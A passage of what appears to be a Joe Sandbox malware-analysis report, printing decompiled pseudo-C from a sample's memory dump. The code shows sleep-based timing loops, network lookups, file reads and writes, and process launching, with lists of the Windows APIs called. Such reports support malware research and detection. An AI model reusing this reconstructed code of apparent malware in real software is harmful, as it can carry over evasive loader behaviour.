    												if( *0x3b85ac != 0) {
    													goto L67;
    												}
    												L51:
    												_t191 =  *0x3b8584; // 0x1
    												_t326 = 0xa;
    												__eflags = _t191;
    												if(_t191 == 0) {
    													L53:
    													_t192 =  *(_t329 - 0x24);
    													__eflags = _t192;
    													if(_t192 <= 0) {
    														while(1) {
    															L55:
    															_t272 =  *0x3b8584; // 0x1
    															__eflags = _t272;
    															if(_t272 != 0) {
    																goto L57;
    															}
    															L56:
    															_t298 =  *0x3b8628; // 0x593938
    															 *(_t298[0x32])(0x4e20);
    															_t326 = _t326 - 1;
    															__eflags = _t326;
    															if(_t326 > 0) {
    																continue;
    															}
    															goto L57;
    														}
    														goto L57;
    													}
    													L54:
    													_t196 = _t192 - 1;
    													__eflags = _t196;
    													 *(_t329 - 0x24) = _t196;
    													_t326 = 1;
    													goto L55;
    												}
    												L52:
    												_t102 = _t326 - 5; // 0x5
    												_t192 = _t102;
    												 *0x3b8584 = 0;
    												goto L54;
    											}
    											L41:
    											if(__eflags > 0) {
    												L43:
    												_t326 = E0039F2D0(_t329 - 0x5c0);
    												_t198 = E003999A0(_t237, _t329 - 0x19, _t323, _t197, _t197);
    												_push(8);
    												__eflags = _t198;
    												if(__eflags == 0) {
    													_push(_t329 - 0x9c0);
    													E00399090(__eflags);
    													E00399090(__eflags, _t329 - 0xdc0, 0xa);
    													_push(_t329 - 0xdc0);
    													_t312 = _t329 - 0x9c0;
    													_push(_t312);
    													_push(0xe);
    													_push(_t329 - 0x5c0);
    												} else {
    													_push(_t329 - 0x9c0);
    													E00399090(__eflags);
    													E00399090(__eflags, _t329 - 0xdc0, 9);
    													_t312 = _t329 - 0xdc0;
    													_push(_t312);
    													_push(_t329 - 0x9c0);
    													_push(0xe);
    													_push(_t329 - 0x5c0);
    												}
    												E00395A10();
    												_t204 = E0039BB40(_t326);
    												__imp___time64(0);
    												_t335 = _t335 + 0x28;
    												 *((intOrPtr*)(_t329 - 0x30)) = _t204;
    												 *((intOrPtr*)(_t329 - 0x2c)) = _t312;
    												goto L47;
    											}
    											L42:
    											__eflags = _t326 - 0x7080;
    											if(_t326 <= 0x7080) {
    												goto L47;
    											}
    											goto L43;
    										}
    										L34:
    										if(__eflags > 0) {
    											L36:
    											_t314 =  *0x3b857c; // 0x1
    											_t210 = _t326 -  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t329 - 0x5b8)) + 0x28)) + _t314 * 8));
    											__eflags = _t210;
    											_t237 = _t323;
    											asm("sbb ebx, [ecx+edx*8+0x4]");
    											 *(_t329 - 0x5c) = _t323;
    											if(__eflags < 0) {
    												goto L40;
    											}
    											L37:
    											if(__eflags > 0) {
    												L39:
    												 *(_t329 - 0x44) = _t326;
    												 *(_t329 - 0x40) = _t323;
    												_t212 = E00391FE0(_t237, _t323, _t326, _t329 - 0xc, _t329 - 0x5c0, _t329 - 0x5b8); // executed
    												_t335 = _t335 + 0xc;
    												__eflags = _t212;
    												if(_t212 != 0) {
    													L59:
    													_t213 = E003A0AD0(_t329 - 0x5c0,  *((intOrPtr*)( *((intOrPtr*)(_t329 - 0x5b8)) + 0x14)));
    													__eflags = _t213;
    													if(_t213 == 0) {
    														goto L67;
    													}
    													L60:
    													 *0x3b857c = 0;
    													goto L62;
    												}
    												goto L40;
    											}
    											L38:
    											__eflags = _t210 - 0x3840;
    											if(_t210 <= 0x3840) {
    												goto L40;
    											}
    											goto L39;
    										}
    										L35:
    										__eflags = _t161 - 0x4b0;
    										if(_t161 <= 0x4b0) {
    											goto L40;
    										}
    										goto L36;
    									}
    									L28:
    									_t215 = _t326 -  *((intOrPtr*)(_t329 - 0x14));
    									__eflags = _t215;
    									asm("sbb ecx, [ebp-0x10]");
    									 *(_t329 - 0x5c) = _t323;
    									if(__eflags < 0) {
    										goto L33;
    									}
    									L29:
    									if(__eflags > 0) {
    										goto L31;
    									}
    									L30:
    									__eflags = _t215 - 0xe10;
    									if(_t215 <= 0xe10) {
    										goto L33;
    									}
    									goto L31;
    									L57:
    									_t156 =  &(( *(_t329 - 0x48))[0]);
    									 *(_t329 - 0x48) = _t156;
    									__eflags = _t156 - 0x64;
    								} while (_t156 < 0x64);
    								goto L62;
    							}
    							L17:
    							if(__eflags > 0) {
    								L19:
    								_t225 = E0039AC90( *((intOrPtr*)(_t329 - 0x5b8)), _t329 - 0x5c0); // executed
    								_t335 = _t332 + 8;
    								__eflags = _t225;
    								if(__eflags == 0) {
    									goto L63;
    								}
    								L20:
    								 *((intOrPtr*)(_t329 - 0x3c)) = _t325;
    								 *(_t329 - 0x38) = _t323;
    								goto L21;
    							}
    							L18:
    							__eflags = _t150 - 0xe10;
    							if(__eflags <= 0) {
    								goto L21;
    							}
    							goto L19;
    						}
    						L13:
    						__eflags = _t147 - 1;
    						if(__eflags != 0) {
    							E0039C870(_t329 - 0x5c0, _t147);
    							_t335 = _t332 + 8;
    						}
    						_t287 =  *0x3b8628; // 0x593938
    						 *(_t287[0x32])(0x3e8);
    						goto L63;
    					}
    					L5:
    					if(__eflags > 0) {
    						L7:
    						_t230 = E0039D890(_t325, __eflags, _t329 - 0xc, _t329 - 0x5c0, _t329 - 0x58); // executed
    						_t331 = _t331 + 0xc;
    						__eflags = _t230;
    						if(_t230 == 0) {
    							L11:
    							_t231 =  *((intOrPtr*)( *((intOrPtr*)(_t329 - 0x5b8)) + 0x24));
    							_t289 =  *0x3b857c; // 0x1
    							 *((intOrPtr*)(_t231 + _t289 * 8)) = _t325;
    							_t321 =  *0x3b857c; // 0x1
    							 *(_t231 + 4 + _t321 * 8) = _t323;
    							goto L12;
    						}
    						L8:
    						__eflags = _t230 - 1;
    						if(_t230 != 1) {
    							E0039C870(_t329 - 0x5c0, _t230);
    							_t335 = _t331 + 8;
    						}
    						_t232 =  *0x3b8628; // 0x593938
    						 *(_t232[0x32])(0x3e8);
    						goto L62;
    					}
    					L6:
    					__eflags = _t145 - 0x3840;
    					if(__eflags <= 0) {
    						goto L12;
    					}
    					goto L7;
    				}
    			}

    APIs
    • _time64.MSVCRT ref: 0039FF16
      • Part of subcall function 0039D890: ??2@YAPAXI@Z.MSVCRT ref: 0039D8EA
      • Part of subcall function 0039D890: ??3@YAXPAX@Z.MSVCRT ref: 0039D929
      • Part of subcall function 0039D890: _time64.MSVCRT ref: 0039D94B
      • Part of subcall function 0039D890: ??3@YAXPAX@Z.MSVCRT ref: 0039D97B
      • Part of subcall function 003A1B80: ??2@YAPAXI@Z.MSVCRT ref: 003A1BAF
      • Part of subcall function 003A1B80: ??3@YAXPAX@Z.MSVCRT ref: 003A1BEE
      • Part of subcall function 003A1B80: _time64.MSVCRT ref: 003A1C10
      • Part of subcall function 003A1B80: ??3@YAXPAX@Z.MSVCRT ref: 003A1C3D
      • Part of subcall function 0039AC90: ??3@YAXPAX@Z.MSVCRT ref: 0039ACCF
      • Part of subcall function 0039AC90: ??3@YAXPAX@Z.MSVCRT ref: 0039AE7A
      • Part of subcall function 003A12C0: WSAStartup.WS2_32(00000202,?), ref: 003A12E2
      • Part of subcall function 003A12C0: gethostname.WS2_32(?,000000FF), ref: 003A1302
      • Part of subcall function 003A12C0: getaddrinfo.WS2_32(?,00000000,00000000,00000000), ref: 003A1322
      • Part of subcall function 003A12C0: freeaddrinfo.WS2_32(00000000), ref: 003A1380
      • Part of subcall function 003A12C0: WSACleanup.WS2_32 ref: 003A1386
      • Part of subcall function 00395A10: Sleep.KERNEL32(00009C40,?,?,?,?,?,?,?,00000000,0039FE81), ref: 00395ABF
      • Part of subcall function 00395A10: Sleep.KERNELBASE(00004E20,00000000,0039FE81,757DC426,00000000,00000000,?,?,00000000,0039FE81), ref: 00395B3E
    • _time64.MSVCRT ref: 003A0104
      • Part of subcall function 003936E0: GetFileAttributesW.KERNELBASE(?), ref: 003939AB
      • Part of subcall function 003936E0: memcpy.MSVCRT ref: 00393BC0
      • Part of subcall function 00391FE0: ??2@YAPAXI@Z.MSVCRT ref: 00392024
      • Part of subcall function 00391FE0: ??3@YAXPAX@Z.MSVCRT ref: 003920A1
      • Part of subcall function 00391FE0: _time64.MSVCRT ref: 003920D2
      • Part of subcall function 00391FE0: ??3@YAXPAX@Z.MSVCRT ref: 003920F9
      • Part of subcall function 003999A0: WSAStartup.WS2_32(00000202,?), ref: 003999CA
      • Part of subcall function 003999A0: freeaddrinfo.WS2_32(?), ref: 00399A2B
      • Part of subcall function 003999A0: getaddrinfo.WS2_32(?,00000000,?,?), ref: 00399AC6
      • Part of subcall function 003999A0: freeaddrinfo.WS2_32(?), ref: 00399B0E
      • Part of subcall function 003999A0: WSACleanup.WS2_32 ref: 00399B34
    • _time64.MSVCRT ref: 003A0280
      • Part of subcall function 003B0A40: ??2@YAPAXI@Z.MSVCRT ref: 003B0AC0
      • Part of subcall function 003B0A40: ??3@YAXPAX@Z.MSVCRT ref: 003B0B35
      • Part of subcall function 003B0A40: _time64.MSVCRT ref: 003B0B63
      • Part of subcall function 003B0A40: ??3@YAXPAX@Z.MSVCRT ref: 003B0B8B
      • Part of subcall function 0039F850: ??3@YAXPAX@Z.MSVCRT ref: 0039F90D
      • Part of subcall function 0039F850: ??3@YAXPAX@Z.MSVCRT ref: 0039F924
      • Part of subcall function 0039F850: ??3@YAXPAX@Z.MSVCRT ref: 0039F955
    • ExitProcess.KERNEL32 ref: 003A04F6
      • Part of subcall function 003A1D90: LoadLibraryA.KERNEL32(?), ref: 003A1DB7
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DD8
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DFE
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E1C
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E3A
      • Part of subcall function 003A1D90: GetProcessHeap.KERNEL32 ref: 003A1E45
      • Part of subcall function 003A1D90: RtlReAllocateHeap.NTDLL(00290000,00000008,?,003A042E), ref: 003A1E5F
      • Part of subcall function 003A1D90: RtlAllocateHeap.NTDLL(00290000,00000008,003A042E), ref: 003A1E72
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
      • Part of subcall function 0039C870: _itow.MSVCRT ref: 0039C889
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd

    Control-flow Graph

    • Executed
    • Not Executed
    C-Code - Quality: 69%
    			E003932C0(void* _a4, intOrPtr _a8) {
    				char _v8;
    				char _v12;
    				void* _v16;
    				char _v20;
    				void* _v24;
    				void* _v28;
    				char _v32;
    				char _v36;
    				intOrPtr _v40;
    				intOrPtr _v44;
    				intOrPtr _v48;
    				char _v52;
    				char _v252;
    				intOrPtr* _t91;
    				intOrPtr _t94;
    				intOrPtr* _t95;
    				intOrPtr _t98;
    				intOrPtr* _t100;
    				intOrPtr* _t103;
    				intOrPtr* _t107;
    				intOrPtr _t108;
    				intOrPtr* _t110;
    				intOrPtr _t112;
    				intOrPtr* _t113;
    				void* _t116;
    				intOrPtr* _t118;
    				intOrPtr _t119;
    				intOrPtr* _t121;
    				intOrPtr _t123;
    				intOrPtr* _t124;
    				intOrPtr _t125;
    				intOrPtr* _t126;
    				intOrPtr _t134;
    				intOrPtr* _t135;
    				char _t138;
    				intOrPtr _t150;
    				intOrPtr _t156;
    				intOrPtr _t163;
    				intOrPtr* _t172;
    				intOrPtr* _t177;
    				intOrPtr _t183;
    				intOrPtr _t187;
    				intOrPtr _t188;
    				intOrPtr* _t189;
    				intOrPtr* _t194;
    
    				_t189 = _a4;
    				_push( &_v24);
    				_push(1);
    				_t138 = 0;
    				_push(_t189);
    				_v12 = 0;
    				_v24 = 0;
    				if( *((intOrPtr*)( *((intOrPtr*)( *_t189 + 0x38))))() >= 0) {
    					_t91 = _v24;
    					_v32 = 0;
    					 *((intOrPtr*)( *((intOrPtr*)( *_t91 + 0x1c))))(_t91,  &_v32);
    					_t94 = 0;
    					__eflags = _v32;
    					if(_v32 > 0) {
    						do {
    							_t177 = _v24;
    							_t12 = _t94 + 1; // 0x1
    							_t188 = _t12;
    							_v28 = _t138;
    							_v52 = 3;
    							_t194 = _t194 - 0x10;
    							_t118 = _t194;
    							 *_t118 = _v52;
    							_t156 = _t188;
    							_v44 = _t156;
    							 *((intOrPtr*)(_t118 + 4)) = _v48;
    							 *((intOrPtr*)(_t118 + 8)) = _t156;
    							 *((intOrPtr*)(_t118 + 0xc)) = _v40;
    							_t119 =  *((intOrPtr*)( *((intOrPtr*)( *_t177 + 0x20))))(_t177,  &_v28);
    							__imp__#9( &_v52);
    							_t138 = 0;
    							__eflags = _t119;
    							if(_t119 >= 0) {
    								_t121 = _v28;
    								_v20 = 0;
    								_t123 =  *((intOrPtr*)( *((intOrPtr*)( *_t121 + 0x1c))))(_t121,  &_v20);
    								__eflags = _t123;
    								if(_t123 >= 0) {
    									__imp__#6(_v20);
    								}
    								_t124 = _v28;
    								_v8 = _t138;
    								_t125 =  *((intOrPtr*)( *((intOrPtr*)( *_t124 + 0x50))))(_t124,  &_v8); // executed
    								__eflags = _t125;
    								if(_t125 >= 0) {
    									_t183 =  *0x3b8628; // 0x593938
    									__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t183 + 0x1e0))))(_v8, _a8);
    									if(__eflags != 0) {
    										E00399090(__eflags,  &_v252, 0x24);
    										_t163 =  *0x3b8628; // 0x593938
    										_t194 = _t194 + 8;
    										_t134 =  *((intOrPtr*)( *((intOrPtr*)(_t163 + 8))))(_v20,  &_v252);
    										__eflags = _t134;
    										if(_t134 == 0) {
    											_t44 =  &_v12;
    											 *_t44 = _v12 + 1;
    											__eflags =  *_t44;
    										} else {
    											_t135 = _a4;
    											 *((intOrPtr*)( *((intOrPtr*)( *_t135 + 0x3c))))(_t135, _v20, _t138);
    										}
    									}
    									__imp__#6(_v8);
    								}
    								_t126 = _v28;
    								 *((intOrPtr*)( *((intOrPtr*)( *_t126 + 8))))(_t126);
    							}
    							_t94 = _t188;
    							__eflags = _t94 - _v32;
    						} while (_t94 < _v32);
    						_t189 = _a4;
    					}
    					_t95 = _v24;
    					 *((intOrPtr*)( *((intOrPtr*)( *_t95 + 8))))(_t95);
    					_v16 = _t138;
    					_t98 =  *((intOrPtr*)( *((intOrPtr*)( *_t189 + 0x28))))(_t189, _t138,  &_v16);
    					__eflags = _t98;
    					if(_t98 < 0) {
    						goto L1;
    					} else {
    						_t100 = _v16;
    						_v36 = _t138;
    						 *((intOrPtr*)( *((intOrPtr*)( *_t100 + 0x1c))))(_t100,  &_v36);
    						_t187 = 0;
    						__eflags = _v36 - _t138;
    						if(_v36 > _t138) {
    							do {
    								_t172 = _v16;
    								_a4 = _t138;
    								_v52 = 3;
    								_t194 = _t194 - 0x10;
    								_t107 = _t194;
    								 *_t107 = _v52;
    								_t187 = _t187 + 1;
    								_t150 = _t187;
    								_v44 = _t150;
    								 *((intOrPtr*)(_t107 + 4)) = _v48;
    								 *((intOrPtr*)(_t107 + 8)) = _t150;
    								 *((intOrPtr*)(_t107 + 0xc)) = _v40;
    								_t108 =  *((intOrPtr*)( *((intOrPtr*)( *_t172 + 0x20))))(_t172,  &_a4);
    								__imp__#9( &_v52);
    								_t138 = 0;
    								__eflags = _t108;
    								if(_t108 >= 0) {
    									_t110 = _a4;
    									_v8 = 0;
    									_t112 =  *((intOrPtr*)( *((intOrPtr*)( *_t110 + 0x1c))))(_t110,  &_v8);
    									__eflags = _t112;
    									if(_t112 >= 0) {
    										__imp__#6(_v8);
    										_t116 = E003932C0(_a4, _a8);
    										_t194 = _t194 + 8;
    										_t81 =  &_v12;
    										 *_t81 = _v12 + _t116;
    										__eflags =  *_t81;
    									}
    									_t113 = _a4;
    									 *((intOrPtr*)( *((intOrPtr*)( *_t113 + 8))))(_t113);
    								}
    								__eflags = _t187 - _v36;
    							} while (_t187 < _v36);
    						}
    						_t103 = _v16;
    						 *((intOrPtr*)( *((intOrPtr*)( *_t103 + 8))))(_t103);
    						return _v12;
    					}
    				} else {
    					L1:
    					return 0;
    				}
    			}

    APIs
    • VariantClear.OLEAUT32(?), ref: 00393495
    • SysFreeString.OLEAUT32(?), ref: 003934BB
      • Part of subcall function 003932C0: VariantClear.OLEAUT32(?), ref: 00393352
      • Part of subcall function 003932C0: SysFreeString.OLEAUT32(003962AB), ref: 0039337C
      • Part of subcall function 003932C0: SysFreeString.OLEAUT32(?), ref: 003933F6
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd

    Control-flow Graph

    • Executed
    • Not Executed
    C-Code - Quality: 92%
    			E003969F0(intOrPtr __eax, intOrPtr _a4, intOrPtr* _a8) {
    				char _v8;
    				char _v12;
    				char _v16;
    				char _v216;
    				void* __ebx;
    				void* __edi;
    				void* _t48;
    				void* _t52;
    				void* _t55;
    				short* _t59;
    				void* _t69;
    				void* _t71;
    				void* _t77;
    				intOrPtr _t79;
    				intOrPtr _t85;
    				intOrPtr _t112;
    				intOrPtr _t114;
    				intOrPtr* _t115;
    				void* _t119;
    				void* _t120;
    				void* _t121;
    				void* _t122;
    				void* _t123;
    				void* _t124;
    
    				_t44 = __eax;
    				_push(0x34);
    				_v8 = 0;
    				_v12 = 0;
    				_v16 = 0;
    				L0039A47E();
    				_t120 = _t119 + 4;
    				if(__eax == 0) {
    					_t79 = 0;
    					__eflags = 0;
    				} else {
    					_t44 = E003970B0(__eax);
    					_t79 = _t44;
    				}
    				_push(0x34);
    				L0039A47E();
    				_t121 = _t120 + 4;
    				_t127 = _t44;
    				if(_t44 == 0) {
    					_t112 = 0;
    					__eflags = 0;
    				} else {
    					_t112 = E003970B0(_t44);
    				}
    				E00399090(_t127,  &_v216, 0xcf);
    				_t48 = E00393C70( &_v12,  &_v216,  &_v8,  &_v12); // executed
    				_t122 = _t121 + 0x14;
    				_t128 = _t48;
    				if(_t48 != 0) {
    					L8:
    					_t49 = _v8;
    					if(_v8 != 0) {
    						_t94 = _v12;
    						if(_v12 > 4) {
    							_t71 = E003B09A0(_a4, _t79,  &_v216, _t49, _t94);
    							E0039BB40(_v8);
    							_t122 = _t122 + 0x18;
    							_v8 = 0;
    							_v12 = 0;
    							if(_t71 == 0) {
    								goto L11;
    							}
    						}
    					}
    				} else {
    					E00399090(_t128,  &_v216, 0x10);
    					_t77 = E00393C70( &_v216,  &_v216,  &_v8,  &_v12); // executed
    					_t122 = _t122 + 0x14;
    					if(_t77 == 0) {
    						L11:
    						if(_t79 != 0) {
    							E0039CB70(_t79, _t79, _t112);
    							_push(_t79);
    							L00391CB0();
    							_t122 = _t122 + 4;
    						}
    						_t79 = 0;
    					} else {
    						goto L8;
    					}
    				}
    				E00399090(0,  &_v216, 0x12);
    				_t52 = E0039F550( &_v8, 0,  &_v216, 0xa,  &_v8,  &_v12);
    				_t123 = _t122 + 0x1c;
    				if(_t52 == 0) {
    					L16:
    					if(_t112 != 0) {
    						E0039CB70(_t79, _t112, _t112);
    						_push(_t112);
    						L00391CB0();
    						_t123 = _t123 + 4;
    					}
    					_t112 = 0;
    				} else {
    					_t69 = E00399020(_t112, _a4, _v8, _v12); // executed
    					if(_t69 == 0) {
    						goto L16;
    					}
    				}
    				if(_t79 == 0) {
    					__eflags = _t112;
    					if(_t112 == 0) {
    						_t114 = _v16;
    						goto L43;
    					} else {
    						_v16 = 1;
    						goto L26;
    					}
    				} else {
    					if(_t112 == 0 ||  *((intOrPtr*)(_t79 + 0x10)) >  *((intOrPtr*)(_t112 + 0x10))) {
    						_v16 = 2;
    						 *_a8 = _t79;
    						_t142 = _t112;
    						if(_t112 != 0) {
    							E0039CB70(_t79, _t112, _t112);
    							_push(_t112);
    							goto L28;
    						}
    					} else {
    						L26:
    						 *_a8 = _t112;
    						__eflags = _t79;
    						if(__eflags != 0) {
    							E0039CB70(_t79, _t79, _t112);
    							_push(_t79);
    							L28:
    							L00391CB0();
    							_t123 = _t123 + 4;
    						}
    					}
    					_t115 = _a8;
    					_t55 = E00392150(_t142,  *_t115); // executed
    					_t124 = _t123 + 4;
    					if(_t55 == 0) {
    						_t59 =  *((intOrPtr*)( *_t115 + 0x14));
    						if(_t59 != 0) {
    							_t85 = 0x7fffffff;
    							while( *_t59 != 0) {
    								_t59 = _t59 + 2;
    								_t85 = _t85 - 1;
    								if(_t85 != 0) {
    									continue;
    								} else {
    								}
    								goto L37;
    							}
    							__eflags = _t85;
    							if(_t85 != 0) {
    								_t117 = 0x7fffffff - _t85;
    								__eflags = 0x7fffffff;
    								E00399090(0x7fffffff,  &_v216, 0xcd);
    								_t37 = _t117 + 2; // 0x80000001
    								E00391A80( &_v216,  &_v216,  *((intOrPtr*)( *_a8 + 0x14)), 0x7fffffff - _t85 + _t37); // executed
    								_t124 = _t124 + 0x14;
    							}
    						}
    					}
    					L37:
    					_t114 = _v16;
    					if(_t114 != 0) {
    						L44:
    						return _t114;
    					} else {
    						if(_t79 != 0) {
    							E0039CB70(_t79, _t79, _t112);
    							_push(_t79);
    							L00391CB0();
    							_t124 = _t124 + 4;
    						}
    						if(_t112 == 0) {
    							L43:
    							 *_a8 = 0;
    							goto L44;
    						} else {
    							E0039CB70(_t79, _t112, _t112);
    							_push(_t112);
    							L00391CB0();
    							 *_a8 = 0;
    							return _t114;
    						}
    					}
    				}
    			}

    APIs
    • ??2@YAPAXI@Z.MSVCRT ref: 00396A09
    • ??2@YAPAXI@Z.MSVCRT ref: 00396A24
      • Part of subcall function 00393C70: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,?,?,?,003A14F1,?,00391BCA,?), ref: 00393C9E
      • Part of subcall function 00393C70: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,?,003A14F1,?,00391BCA,?,?,000000B3,00000000,?,?), ref: 00393CBB
      • Part of subcall function 00393C70: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,003A14F1,?,00391BCA,?,?,000000B3,00000000,?,?), ref: 00393CD0
      • Part of subcall function 00393C70: ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?), ref: 00393D08
    • ??3@YAXPAX@Z.MSVCRT ref: 00396C1E
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
    • ??3@YAXPAX@Z.MSVCRT ref: 00396ADA
    • ??3@YAXPAX@Z.MSVCRT ref: 00396B34
    • ??3@YAXPAX@Z.MSVCRT ref: 00396B88
      • Part of subcall function 00391A80: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000,0000001F,00000000,00391BCA,?,003A171D,?,00391BCA,?,?), ref: 00391AAB
      • Part of subcall function 00391A80: WriteFile.KERNEL32(00000000,?,00391BCA,000000CC,00000000,?,003A171D,?,00391BCA,?,?,000000CC), ref: 00391ACD
    • ??3@YAXPAX@Z.MSVCRT ref: 00396C0A
      • Part of subcall function 0039CB70: SysFreeString.OLEAUT32(?), ref: 0039CB81
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd

    Control-flow Graph

    C-Code - Quality: 56%
    			E0039FC18() {
    				int _t200;
    				int _t202;
    				int _t204;
    				void* _t210;
    				void* _t211;
    				signed int* _t216;
    				int _t225;
    				void* _t227;
    				long _t228;
    				intOrPtr _t229;
    				long _t230;
    				void* _t233;
    				long _t240;
    				int _t249;
    				long _t251;
    				long _t255;
    				long _t256;
    				long _t258;
    				long _t261;
    				void* _t263;
    				long _t267;
    				int _t268;
    				long _t270;
    				long _t272;
    				long _t273;
    				long _t274;
    				long _t275;
    				long _t279;
    				long _t280;
    				long _t284;
    				long _t286;
    				int _t292;
    				long _t298;
    				long _t300;
    				long _t301;
    				long _t303;
    				long _t313;
    				long _t318;
    				intOrPtr _t319;
    				int _t320;
    				signed int* _t334;
    				int _t336;
    				signed int _t351;
    				int _t355;
    				signed int _t369;
    				signed int _t385;
    				long _t390;
    				int _t405;
    				signed int _t407;
    				int _t419;
    				int _t420;
    				int _t422;
    				int _t423;
    				int _t424;
    				signed short* _t425;
    				int _t434;
    				signed int _t435;
    				int _t440;
    				int _t446;
    				signed int _t448;
    				signed int _t455;
    				int _t457;
    				int _t459;
    				void* _t460;
    				void* _t461;
    				void* _t463;
    				long _t464;
    				void* _t466;
    				void* _t467;
    				void* _t468;
    				void* _t471;
    				void* _t473;
    				void* _t474;
    				void* _t475;
    				void* _t480;
    
    				do {
    					_t336 =  *0x3b8628; // 0x593938
    					 *(_t466 - 0x14) =  *(_t466 - 0x14) +  *((intOrPtr*)( *((intOrPtr*)(_t336 + 0x30))))();
    					asm("adc [ebp-0x10], ecx");
    					Sleep(1); // executed
    				} while (_t461 - 1 > _t333);
    				_t200 =  *0x3b8628; // 0x593938
    				 *0x3b85dc = _t333;
    				 *0x3b85f8 = _t333;
    				 *0x3b85fc = _t333;
    				 *0x3b85c8 = _t333;
    				 *((intOrPtr*)( *((intOrPtr*)(_t200 + 0xbc))))(_t333, _t466 - 0x9c0, 0x200);
    				_t202 =  *0x3b8628; // 0x593938
    				 *((intOrPtr*)( *((intOrPtr*)(_t202 + 0x1e8))))(_t466 - 0x9c0);
    				_t204 =  *0x3b8628; // 0x593938
    				 *((intOrPtr*)( *((intOrPtr*)(_t204 + 0x1d8))))(_t466 - 0x9c0);
    				SetCurrentDirectoryW(_t466 - 0x9c0);
    				_t419 =  *0x3b8628; // 0x593938
    				srand( *((intOrPtr*)( *((intOrPtr*)(_t419 + 0xd0))))());
    				_t468 = _t467 + 4; // executed
    				_t210 = E0039EB30(); // executed
    				_t211 = E0039BAF0(_t210);
    				_t478 = _t211;
    				if(_t211 == 0) {
    					L89:
    					_t480 =  *0x3b85ac - _t333; // 0x0
    					if(_t480 == 0) {
    						L102:
    						E00399480();
    						E00397E10();
    						ExitProcess(_t333);
    					}
    					_t420 =  *0x3b8628; // 0x593938
    					_t463 = 0;
    					 *((intOrPtr*)(_t466 - 0x70)) = 0;
    					 *((intOrPtr*)(_t466 - 0x6c)) = 0;
    					 *((intOrPtr*)(_t466 - 0x68)) = 0;
    					 *((intOrPtr*)(_t466 - 0x64)) = 0;
    					 *(_t466 - 0x18) = 0;
    					 *((intOrPtr*)(_t466 - 0xb8)) = 0x44;
    					 *((intOrPtr*)( *((intOrPtr*)(_t420 + 0xb8))))(_t466 - 0xb8);
    					E00398030(_t466 - 0x18);
    					_t216 = E003A1D90(0x20a, 0);
    					_t334 = _t216;
    					if(_t334 == 0) {
    						L101:
    						_t422 =  *0x3b8628; // 0x593938
    						 *((intOrPtr*)( *((intOrPtr*)(_t422 + 0xd8))))( *(_t466 - 0x18), _t463, _t463, _t463, _t463, _t463, _t463, _t334, _t466 - 0xb8, _t466 - 0x70);
    						_t423 =  *0x3b8628; // 0x593938
    						 *((intOrPtr*)( *((intOrPtr*)(_t423 + 0xf8))))( *((intOrPtr*)(_t466 - 0x70)));
    						_t424 =  *0x3b8628; // 0x593938
    						 *((intOrPtr*)( *((intOrPtr*)(_t424 + 0xf8))))( *((intOrPtr*)(_t466 - 0x6c)));
    						E0039BB40( *(_t466 - 0x18));
    						_t333 = 0;
    						goto L102;
    					}
    					_t425 =  *(_t466 - 0x18);
    					_t464 = 0x104;
    					_t460 = 0;
    					while(1) {
    						_t187 = _t464 + 0x7ffffefa; // 0x7ffffffe
    						if(_t187 == 0) {
    							break;
    						}
    						_t351 =  *_t425 & 0x0000ffff;
    						if(_t351 == 0) {
    							break;
    						}
    						 *_t216 = _t351;
    						_t216 =  &(_t216[0]);
    						_t425 =  &(_t425[1]);
    						_t464 = _t464 - 1;
    						if(_t464 != 0) {
    							continue;
    						}
    						L97:
    						_t216 = _t216 - 2;
    						_t460 = 0x8007007a;
    						L98:
    						 *_t216 = 0;
    						if(_t460 >= 0) {
    							_t225 =  *0x3b8628; // 0x593938
    							 *((intOrPtr*)( *((intOrPtr*)(_t225 + 0x1e8))))(_t334);
    						}
    						_t463 = 0;
    						goto L101;
    					}
    					__eflags = _t464;
    					if(_t464 != 0) {
    						goto L98;
    					}
    					goto L97;
    				}
    				_t227 = E00393500(_t466 - 4, _t478); // executed
    				_t479 = _t227;
    				if(_t227 == 0) {
    					 *(_t466 - 0x34) = _t333;
    					_t228 = GetCurrentProcess();
    					__imp__IsWow64Process(_t228, _t466 - 0x34);
    					__eflags = _t228;
    					if(_t228 != 0) {
    						E0039E7D0(_t466 - 0x9c0,  *(_t466 - 0x34)); // executed
    						_t468 = _t468 + 8;
